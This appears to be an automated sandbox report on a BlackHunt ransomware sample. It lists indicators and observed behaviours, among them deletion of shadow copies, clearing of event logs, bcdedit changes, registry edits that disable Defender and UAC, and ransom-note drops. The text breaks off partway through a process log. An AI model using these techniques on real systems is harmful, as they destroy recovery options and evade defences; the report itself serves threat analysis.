Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
144s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:59
Static task
static1
Behavioral task
behavioral1
Sample
8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe
Resource
win10v2004-20231215-en
General
-
Target
8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe
-
Size
707KB
-
MD5
cd9f4834cda6012f49f5e378b4c3f80a
-
SHA1
3c98ee715a8707346988ffc62fdaf8b2aa9ec5c3
-
SHA256
8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5
-
SHA512
400e3bba846759d021f5187d4e4258c606061a80cb9253edd89223523260a6e842dbfbde1fdfb8f9bb4f4273291ec022c509613c816e672df9eba1238daa2370
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1w8Ivnh:6uaTmkZJ+naie5OTamgEoKxLWT2h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 8684 fsutil.exe 12264 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 22312 wevtutil.exe 11712 wevtutil.exe 11808 wevtutil.exe 11856 wevtutil.exe 11904 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 8300 bcdedit.exe 8712 bcdedit.exe 12052 bcdedit.exe 12144 bcdedit.exe -
Renames multiple (3353) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 8692 wbadmin.exe 20508 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" Conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\L: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\V: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\M: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\R: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\Y: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\P: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\G: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\I: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\S: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\H: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\K: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\Z: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\X: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\W: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\T: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\A: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\U: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\N: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\B: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\Q: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened (read-only) \??\O: 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_super.gif 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\delete.svg 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\ui-strings.js 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\#BlackHunt_Private.key 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\#BlackHunt_ReadMe.txt 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files\Java\jre-1.8\lib\deploy\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\ui-strings.js 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\de-de\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\ui-strings.js 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\ui-strings.js 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\#BlackHunt_ReadMe.txt 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\#BlackHunt_Private.key 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\giflib.md 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\#BlackHunt_Private.key 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\ui-strings.js 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\#BlackHunt_Private.key 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#BlackHunt_ReadMe.txt 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\sendforcomments.svg 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\ui-strings.js 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\#BlackHunt_ReadMe.txt 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\#BlackHunt_ReadMe.txt 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\ui-strings.js 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\en-US.pak 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\#BlackHunt_Private.key 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\ui-strings.js 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-cn\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\#BlackHunt_Private.key 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\#BlackHunt_ReadMe.txt 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Bold.otf 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\ui-strings.js 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\splash.gif 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main.css 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_checkbox_selected_18.svg 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\#BlackHunt_Private.key 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\#BlackHunt_Private.key 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\#BlackHunt_ReadMe.txt 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\#BlackHunt_ReadMe.txt 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-es_es_2x.gif 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\#BlackHunt_Private.key 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\#BlackHunt_Private.key 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files\7-Zip\Lang\fa.txt 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviewers.gif 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\ui-strings.js 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\resources.jar 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxSelected.svg 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\#BlackHunt_ReadMe.txt 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\#BlackHunt_Private.key 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\#BlackHunt_ReadMe.txt 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode.png 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\#BlackHunt_ReadMe.hta 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 20948 20816 WerFault.exe 293 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 640 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5476 vssadmin.exe 7644 vssadmin.exe 8200 vssadmin.exe 5520 vssadmin.exe 8216 vssadmin.exe 11948 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 20724 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ Conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 20616 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe Token: SeRestorePrivilege 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe Token: SeBackupPrivilege 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe Token: SeTakeOwnershipPrivilege 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe Token: SeAuditPrivilege 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe Token: SeSecurityPrivilege 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe Token: SeIncBasePriorityPrivilege 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe Token: SeBackupPrivilege 6968 vssvc.exe Token: SeRestorePrivilege 6968 vssvc.exe Token: SeAuditPrivilege 6968 vssvc.exe Token: SeBackupPrivilege 16100 wbengine.exe Token: SeRestorePrivilege 16100 wbengine.exe Token: SeSecurityPrivilege 16100 wbengine.exe Token: SeSecurityPrivilege 22312 wevtutil.exe Token: SeBackupPrivilege 22312 wevtutil.exe Token: SeSecurityPrivilege 11712 wevtutil.exe Token: SeBackupPrivilege 11712 wevtutil.exe Token: SeSecurityPrivilege 11808 wevtutil.exe Token: SeBackupPrivilege 11808 wevtutil.exe Token: SeSecurityPrivilege 11856 wevtutil.exe Token: SeBackupPrivilege 11856 wevtutil.exe Token: SeSecurityPrivilege 11904 wevtutil.exe Token: SeBackupPrivilege 11904 wevtutil.exe Token: SeDebugPrivilege 20724 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4744 wrote to memory of 964 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 90 PID 4744 wrote to memory of 964 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 90 PID 4744 wrote to memory of 832 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 93 PID 4744 wrote to memory of 832 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 93 PID 4744 wrote to memory of 4256 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 92 PID 4744 wrote to memory of 4256 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 92 PID 4744 wrote to memory of 2744 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 96 PID 4744 wrote to memory of 2744 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 96 PID 964 wrote to memory of 724 964 cmd.exe 162 PID 964 wrote to memory of 724 964 cmd.exe 162 PID 4744 wrote to memory of 4672 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 99 PID 4744 wrote to memory of 4672 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 99 PID 2744 wrote to memory of 396 2744 cmd.exe 102 PID 2744 wrote to memory of 396 2744 cmd.exe 102 PID 4744 wrote to memory of 5088 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 101 PID 4744 wrote to memory of 5088 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 101 PID 4744 wrote to memory of 4560 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 107 PID 4744 wrote to memory of 4560 4744 8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe 107 PID 4256 wrote to memory of 4888 4256 cmd.exe 104 PID 4256 wrote to memory of 4888 4256 cmd.exe 104 PID 832 wrote to memory of 2224 832 cmd.exe 105 PID 832 wrote to memory of 2224 832 cmd.exe 105 PID 4744 